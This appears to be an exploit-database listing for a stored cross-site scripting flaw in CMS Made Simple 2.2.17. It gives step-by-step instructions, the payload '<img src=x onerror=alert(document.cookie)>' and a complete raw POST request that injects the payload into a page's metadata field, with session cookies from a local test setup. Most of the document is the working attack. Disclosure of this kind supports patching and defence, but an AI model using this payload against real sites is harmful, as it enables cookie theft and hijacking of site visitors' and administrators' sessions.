Exploit for CMS Made Simple 2.2.17 Cross Site Scripting

Name: Exploit for CMS Made Simple 2.2.17 Cross Site Scripting
Rating: 5 (32 reviews)
2023-07-20 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:173624
#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)  
#Application: CmsMadeSimple  
#Version: v2.2.17  
#Bugs: Stored Xss  
#Technology: PHP  
#Vendor URL: https://www.cmsmadesimple.org/  
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms  
#Date of found: 12-07-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux   
  
2. Technical Details & POC  
========================================  
steps:   
1. Login to account  
2. Go to Content Manager  
3. Add New Content  
4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section  
  
payload: <img src=x onerror=alert(document.cookie)>  
  
5. Submit Content  
6. Visit Content (http://localhost/index.php?page=test)  
  
Request:  
  
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1  
Host: localhost  
Content-Length: 584  
sec-ch-ua:   
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
sec-ch-ua-platform: ""  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6  
Connection: close  
  
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1